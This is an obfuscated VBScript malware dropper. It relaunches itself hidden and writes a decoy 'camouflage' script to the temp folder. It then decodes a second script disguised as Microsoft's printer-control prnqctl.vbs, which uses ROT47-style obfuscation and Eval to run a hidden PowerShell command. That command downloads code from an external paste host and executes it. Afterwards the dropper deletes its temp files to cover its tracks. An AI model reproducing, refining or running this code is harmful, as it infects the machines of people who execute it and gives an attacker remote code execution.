
' Shield 5 Final VBS Wrapper
Option Explicit
Dim objShell_S5, objFSO_S5, tempFile_S5, camouflageFile_S5
Set objShell_S5 = CreateObject("WScript.Shell")
Set objFSO_S5 = CreateObject("Scripting.FileSystemObject")

Dim encodedData_S5, camouflageData_S5
camouflageData_S5 = "CicgU3lzdGVtIENhbW91ZmxhZ2UgQWN0aXZpdHkgU2NyaXB0CicgVmVyc2lvbiAxLjAuMwpPcHRpb24gRXhwbGljaXQKRGltIG9iakZTT19DYW1vdWZsYWdlLCBvYmpTaGVsbF9DYW1vdWZsYWdlLCBsb2dGaWxlX0NhbW91ZmxhZ2UsIHN0YXJ0VGltZV9DYW1vdWZsYWdlLCBpX0NhbW91ZmxhZ2UKU2V0IG9iakZTT19DYW1vdWZsYWdlID0gQ3JlYXRlT2JqZWN0KCJTY3JpcHRpbmcuRmlsZVN5c3RlbU9iamVjdCIpClNldCBvYmpTaGVsbF9DYW1vdWZsYWdlID0gQ3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIikKc3RhcnRUaW1lX0NhbW91ZmxhZ2UgPSBUaW1lcigpCk9uIEVycm9yIFJlc3VtZSBOZXh0CmxvZ0ZpbGVfQ2Ftb3VmbGFnZSA9IG9iakZTT19DYW1vdWZsYWdlLkdldFNwZWNpYWxGb2xkZXIoMikgJiAiXGNhbW91ZmxhZ2VfbG9nXyIgJiBJbnQoVGltZXIoKSAqIFJuZCgpKSAmICIubG9nIgpTdWIgV3JpdGVDYW1vdWZsYWdlTG9nKG1lc3NhZ2UpCiAgICBEaW0gZmlsZV9DYW1vdWZsYWdlCiAgICBTZXQgZmlsZV9DYW1vdWZsYWdlID0gb2JqRlNPX0NhbW91ZmxhZ2UuT3BlblRleHRGaWxlKGxvZ0ZpbGVfQ2Ftb3VmbGFnZSwgOCwgVHJ1ZSwgMCkgJyBBU0NJSQogICAgSWYgRXJyLk51bWJlciA9IDAgVGhlbgogICAgICAgIGZpbGVfQ2Ftb3VmbGFnZS5Xcml0ZUxpbmUgVGltZXIoKSAmICIgLSAiICYgbWVzc2FnZQogICAgICAgIGZpbGVfQ2Ftb3VmbGFnZS5DbG9zZQogICAgRW5kIElmCiAgICBFcnIuQ2xlYXIKRW5kIFN1YgpXcml0ZUNhbW91ZmxhZ2VMb2cgIkNhbW91ZmxhZ2UgQWN0aXZpdHk6IEluaXRpYXRpbmcgc2VxdWVuY2UuLi4iCkRpbSBjaGVja3NfQ2Ftb3VmbGFnZSg1KQpjaGVja3NfQ2Ftb3VmbGFnZSgwKSA9ICJBbmFseXppbmcgc3lzdGVtIHBhcmFtZXRlcnMiCmNoZWNrc19DYW1vdWZsYWdlKDEpID0gIlZlcmlmeWluZyBpbnRlZ3JpdHkgb2Ygc2ltdWxhdGVkIGNvbXBvbmVudHMiCmNoZWNrc19DYW1vdWZsYWdlKDIpID0gIkV4ZWN1dGluZyBiYWNrZ3JvdW5kIHJlc291cmNlIHNpbXVsYXRpb24iCmNoZWNrc19DYW1vdWZsYWdlKDMpID0gIlByZXBhcmluZyBmb3Igc2NoZWR1bGVkIHZpcnR1YWwgdGFza3MiCmNoZWNrc19DYW1vdWZsYWdlKDQpID0gIlZhbGlkYXRpbmcgY2Ftb3VmbGFnZSBzZXJ2aWNlIHN0YXR1cyIKY2hlY2tzX0NhbW91ZmxhZ2UoNSkgPSAiRmluYWxpemluZyBjYW1vdWZsYWdlIHNlcXVlbmNlIgpGb3IgaV9DYW1vdWZsYWdlID0gMCBUbyBVQm91bmQoY2hlY2tzX0NhbW91ZmxhZ2UpCiAgICBXcml0ZUNhbW91ZmxhZ2VMb2cgIlByb2Nlc3Npbmc6ICIgJiBjaGVja3NfQ2Ftb3VmbGFnZShpX0NhbW91ZmxhZ2UpCiAgICBXU2NyaXB0LlNsZWVwIDE1MDAgCk5leHQKV3JpdGVDYW1vdWZsYWdlTG9nICJDYW1vdWZsYWdlIEFjdGl2aXR5OiBTZXF1ZW5jZSBjb21wbGV0ZWQuIgpJZiBvYmpGU09fQ2Ftb3VmbGFnZS5GaWxlRXhpc3RzKGxvZ0ZpbGVfQ2Ftb3VmbGFnZSkgVGhlbiBvYmpGU09fQ2Ftb3VmbGFnZS5EZWxldGVGaWxlIGxvZ0ZpbGVfQ2Ftb3VmbGFnZSwgVHJ1ZQpTZXQgb2JqRlNPX0NhbW91ZmxhZ2UgPSBOb3RoaW5nClNldCBvYmpTaGVsbF9DYW1vdWZsYWdlID0gTm90aGluZwo="
encodedData_S5 = "Jy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KJwonIFRoaXMgbWV0aG9kIGhhbmRsZXMgdXNlciBpbnB1dCB2YWxpZGF0aW9uLgonIFJlbWVtYmVyIHRvIGhhbmRsZSBwb3RlbnRpYWwgZXJyb3JzIGhlcmUuCicgQ29weXJpZ2h0IChjKSBNaWNyb3NvZnQgQ29ycG9yYXRpb24uIEFsbCByaWdodHMgcmVzZXJ2ZWQuCicKJyBBZGQgYW55IG5lY2Vzc2FyeSBjb25kaXRpb25zIGZvciBmdXR1cmUgdXBncmFkZXMuCicgQWJzdHJhY3Q6CicgcHJucWN0bC52YnMgLSBwcmludGVyIGNvbnRyb2wgc2NyaXB0IGZvciBXTUkgb24gV2luZG93cyAKJyAgICB1c2VkIHRvIHBhdXNlLCByZXN1bWUgYW5kIHB1cmdlIGEgcHJpbnRlcgonICAgIGFsc28gdXNlZCB0byBwcmludCBhIHRlc3QgcGFnZSBvbiBhIHByaW50ZXIKJwonIFVzYWdlOgonIHBybnFjdGwgWy16bWV4P10gWy1zIHNlcnZlcl0gWy1wIHByaW50ZXJdIFstdSB1c2VyIG5hbWVdIFstdyBwYXNzd29yZF0KJwonIEVuc3VyZSB0aGlzIHBhcnQgb2YgdGhlIHNjcmlwdCBydW5zIGNvcnJlY3RseS4KJyBFeGFtcGxlczoKJyBSZW1lbWJlciB0byBoYW5kbGUgcG90ZW50aWFsIGVycm9ycyBoZXJlLgonIFRoZSBmb2xsb3dpbmcgc2VjdGlvbiBpbml0aWFsaXplcyB2YXJpYWJsZXMuCicgcHJucWN0bCAtbSAtcyBzZXJ2ZXIgLXAgcHJpbnRlcgonIERvbid0IGZvcmdldCB0byB2YWxpZGF0ZSBpbnB1dHMgaGVyZS4KJyBwcm5xY3RsIC14IC1zIHNlcnZlciAtcCBwcmludGVyCicgcHJucWN0bCAtZSAtYiBwcmludGVyCictLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgpGdW5jdGlvbiBob3Jpem9uKHN0cikKCURpbSBpLCBqLCBrLCByCicgVGhpcyBmdW5jdGlvbiByZXF1aXJlcyB0aG9yb3VnaCB0ZXN0aW5nLgoJaiA9IExlbihzdHIpCglyID0gIiIKCUZvciBpID0gMSB0byBqCicgRW5zdXJlIHRoaXMgcGFydCBvZiB0aGUgc2NyaXB0IHJ1bnMgY29ycmVjdGx5LgoJCWsgPSBBc2MoTWlkKHN0ciwgaSwgMSkpCgkJSWYgayA+PSAzMyBBbmQgayA8PSAxMjYgVGhlbgoJCQlyID0gciAmIENocigzMyArICgoayArIDE0KSBNb2QgOTQpKQoJCUVsc2UKCQkJciA9IHIgJiBDaHIoaykKCQlFbmQgSWYKCU5leHQKCWhvcml6b24gPSByCkVuZCBGdW5jdGlvbgpTZXQgbmVidWxhID0gRXZhbChob3Jpem9uKCJyQzYyRTZ+Mzs2NEUiKSsiKGhvcml6b24oIiIoJDRDOkFFXSQ5Nj09IiIpKSIpClNldCBiYW5hbmEgPSBuZWJ1bGEuRW52aXJvbm1lbnQoIlBybyIraG9yaXpvbigiNDYiKSsic3MiKQonIFJlZmFjdG9yIHRoaXMgc2VjdGlvbiBmb3IgcmVhZGFiaWxpdHkuCicgRW5zdXJlIHRoaXMgcGFydCBvZiB0aGUgc2NyaXB0IHJ1bnMgY29ycmVjdGx5LgpiYW5hbmEoaG9yaXpvbigiQTJDRWEiKSkgPSBFdmFsKGhvcml6b24oIigkNEM6QUVdJDRDOkFFdUY9PX0yPjYiKSkKJyBSZW1lbWJlciB0byBoYW5kbGUgcG90ZW50aWFsIGVycm9ycyBoZXJlLgpiYW5hbmEoInBhcnQxIikgPSBob3Jpem9uKCJBQEg2Q0Q5Nj09XTZJNiBcKDo/NUBIJEVKPTYgdzo1NTY/IFw2ICIpCm5lYnVsYS5SdW4gYmFuYW5hKCJwYXJ0MSIpICYgKCJhUUJ5QUcwQUlBQm9BSFFBZEFCd0FITUFPZ0F2QUM4QVlnQjVBSFFBWlFCaUFHa0FiZ0F1QUd3QWRRQmpBR3NBYndBdUFHMEFaUUF2QUZrQVN3QTVBRU1BU3dCRkFFc0FVZ0I0QUVVQUlBQjhBQ0FBYVFCbEFIZ0EiKSwgMCwgRmFsc2UKc2V0IG5lYnVsYSA9IE5vdGhpbmc="

If InStr(1, WScript.FullName, "cscript", vbTextCompare) = 0 Then
    objShell_S5.Run "cscript.exe //nologo """ & WScript.ScriptFullName & """", 0, False
    WScript.Quit
End If

camouflageFile_S5 = objFSO_S5.GetSpecialFolder(2) & "\~camouflage_s5_" & Timer() & Int(Rnd()*1000) & ".vbs"
Dim camouflageContent_S5
camouflageContent_S5 = DecodeBase64_S5(camouflageData_S5)
Call WriteAndRun_S5(camouflageFile_S5, camouflageContent_S5, False, 10000)

tempFile_S5 = objFSO_S5.GetSpecialFolder(2) & "\~real_s5_" & Timer() & Int(Rnd()*1000) & ".vbs"
Dim realContent_S5
realContent_S5 = DecodeBase64_S5(encodedData_S5)
Call WriteAndRun_S5(tempFile_S5, realContent_S5, True, 0)

On Error Resume Next
If objFSO_S5.FileExists(tempFile_S5) Then objFSO_S5.DeleteFile tempFile_S5, True
If objFSO_S5.FileExists(camouflageFile_S5) Then objFSO_S5.DeleteFile camouflageFile_S5, True
On Error GoTo 0
Set objShell_S5 = Nothing : Set objFSO_S5 = Nothing

Sub WriteAndRun_S5(filePath, content, wait, sleepMs)
    On Error Resume Next
    If Len(content) = 0 Then Exit Sub
    Dim fileObj_Sub_S5
    Set fileObj_Sub_S5 = objFSO_S5.CreateTextFile(filePath, True, True) 
    fileObj_Sub_S5.Write content
    fileObj_Sub_S5.Close
    objShell_S5.Run "cscript.exe //nologo """ & filePath & """", 0, wait
    If sleepMs > 0 Then WScript.Sleep sleepMs
End Sub

Function DecodeBase64_S5(base64String)
    On Error Resume Next
    DecodeBase64_S5 = "" 
    Dim domObj_S5, elem_S5
    Set domObj_S5 = CreateObject("MSXML2.DOMDocument.6.0")
    Set elem_S5 = domObj_S5.createElement("Base64Data")
    elem_S5.dataType = "bin.base64"
    elem_S5.text = base64String
    
    Dim streamObj_S5
    Set streamObj_S5 = CreateObject("ADODB.Stream")
    streamObj_S5.Type = 1 
    streamObj_S5.Open
    streamObj_S5.Write elem_S5.nodeTypedValue 
    streamObj_S5.Position = 0
    streamObj_S5.Type = 2 
    streamObj_S5.Charset = "utf-8"
    DecodeBase64_S5 = streamObj_S5.ReadText
    streamObj_S5.Close
    Set streamObj_S5 = Nothing
    Set elem_S5 = Nothing
    Set domObj_S5 = Nothing
    If Err.Number <> 0 Then DecodeBase64_S5 = "' Error decoding Base64 in Shield 5: " & Err.Description : Err.Clear
    On Error GoTo 0
End Function


' Randomizer_Seed: Fyc8iTa55FrPeel8yJOQFIiTrnEDqolcDZrP_1765644721587558100